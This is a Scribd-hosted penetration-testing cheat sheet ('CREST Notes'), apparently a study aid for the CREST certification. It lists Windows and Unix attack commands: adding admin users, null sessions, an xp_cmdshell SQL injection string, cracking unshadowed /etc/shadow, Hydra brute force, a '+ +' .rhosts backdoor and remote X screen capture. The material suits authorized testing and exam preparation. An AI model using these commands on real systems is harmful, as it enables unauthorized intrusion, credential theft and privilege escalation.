Scribd
Upload
52 views

CREST CheatSheet

This document provides information on commands and techniques for Windows and Linux/Unix systems. It covers topics such as viewing domain information, adding users, scanning SMB, viewing domain controllers, null sessions, password cracking, SSH key generation, X windows commands, SCP, finger, John the Ripper, Hydra, finding files, SUID/SGID programs, network services configuration, and network mapping. The document serves as a reference guide for penetration testing activities on Windows and Linux/Unix systems.

Uploaded by

fabien.yvan
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
52 views

CREST CheatSheet

This document provides information on commands and techniques for Windows and Linux/Unix systems. It covers topics such as viewing domain information, adding users, scanning SMB, viewing domain controllers, null sessions, password cracking, SSH key generation, X windows commands, SCP, finger, John the Ripper, Hydra, finding files, SUID/SGID programs, network services configuration, and network mapping. The document serves as a reference guide for penetration testing activities on Windows and Linux/Unix systems.

Uploaded by

fabien.yvan
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 3

Windows –

Domain: Comment
net view list computers on domain
net view \\<target name/ip> list shares on host
net view /domain list domains
net view /domain:<domain name> list computers on named domain
net user edward williams /add add a user
net localgroup Administrators edward /add add to administrators group
nbtscan 192.168.226.0/24 Scans smb domain

Domain Controllers: Comment


nltest /dclist:<domain name> Domain controllers
nltest /dsgetdc:<domain name> /pdc More pdc info
nltest /bdc_query:<domain name> bdc info (if any)
nltest /server:<ip> /trusted_domains Need null share

Hosts: Comment
net use \\<target>\ipc$ “” /u:”” null session
nbtstat -a <name> / -A <ip> netbios name table and target mac
epdump <target> look for ips in endpoints
enum -SUPc enum shares/users/password policy

SQL: Comment
‘;Exec xp_cmdshell ‘net user <user> beware of password complexity
<passwd> /add’;-- issues

sp_configure 'show advanced options', 1 set advanced options then use


reconfigure
next statement:
sp_configure 'xp_cmdshell', 1
reconfigure this will re-enable xp_cmdshell if
turned off

Windows Misc: Comment


dir filename /s Find file called filename and all sub
dirs
findstr /S /I “password” *.txt Find all occurrences of password in
or text files
findstr /S /I /M “password” *.txt (just
print files)
psexec \\192.168.0.1 -s cmd.exe Null session first
Tasklist /?
Tasklist /svc
Tasklist /FI "USERNAME eq NT AUTHORITY\
SYSTEM" /SVC

Then

Sc qc <servicename>

Ed – CREST Notes
Linux / Unix -

NFS: Comment
showmount -e <target> displays exports
sudo mount -t nfs <target>:/<export> don’t forget to mkdir mount point
<mount point>
adduser --uid <uid> –-gid <gid> <username> note password policy on local (+6
chars)

su - <user> and ssh-keygen Switch and gen keys for ssh


X Comment
xwininfo -tree -root -display <ip>:0 | will pipe back hex value for
grep -i term window
xwd –root -display <ip>:0.0 | xwud capture screen
xwd -id <hex value> -display <ip>:0 | xwud capture specific screen
xkill -display <ip>:0 kill process/window
x-dumper.sh

SCP: Comment
scp file ed@ninja:/home/ed copy file to ninja
scp ed@ninja:/home/ed/file file copy file from ninja

Putty Copy: Comment


pscp.exe Copy from ssh host to c:\
[email protected]:/home/ed/Desktop/test.txt c:\

Finger: Comment
finger -l @target, 0@tаrget, .@tаrget, **@tаrget long list
finger (user, admin, ..)@target various flaws in finger
finger '1 2 3 4 5 6 7 8 9 0'@target Solaris 8 Bug

R Services: Comment
echo + + > /usr/bin/.rhosts – look in users home dir
check /etc/hosts.equiv

John Comment
unshadow /etc/passwd /etc/shadow > file Change /etc/john/john.conf
john –i:mode file to match min passwd req.
john –wordlist=words.txt file

hydra Comment
hydra –e ns –l user –P words.txt –v <ip> smb bash it

Unix Misc: Comment


find . -type f -name *payroll* Solaris find file names

Ed – CREST Notes
2>/dev/null (case sensitive)

find . -type f | grep -i 'Payroll'


2>/dev/null (case insensitive)
find . -type f -exec grep -i -l Solaris find file content
'Payroll' '{}' \; 2>/dev/null
find / -type f –iname ‘*Payroll*’ Linux find file names
2>/dev/null
grep –i –l –r whatever * 2>/dev/null Linux find file contents

find / -type f –exec grep –i –l Find files


“password” ‘{}’ \; 2>/dev/null
Or
grep –i –l ‘password’ *

find / -type f -print | grep -i "passwd" Solaris find case insensitive


2>/dev/null
find / -type f \( –perm -04000 -o –perm SUID / SGID (-o)
-02000 \) 2>/dev/null
find / -type f –perm -002 Word writable
showrev –p, uname –a, pkginfo -x Solaris patch info
netstat –nap – list processes and ports
(needs sudo)
lsof –i :port
lsof –p <pid> -P (-P gives port)
ps –ef (list processes)

export PATH=$PATH:/whatever ( bash) Add path in BASH/sh shell – valid


for terminal session only
PATH=$PATH:/whatever
export PATH ( sh )

Network Mapping Comment


dig @<nameserver> <domain name> axfr Zone transfer
traceroute <target> Default udp (-I ICMP, -T TCP, default
port 80).
ping -R <target> Record route, read from bottom up.

Ed – CREST Notes

You might also like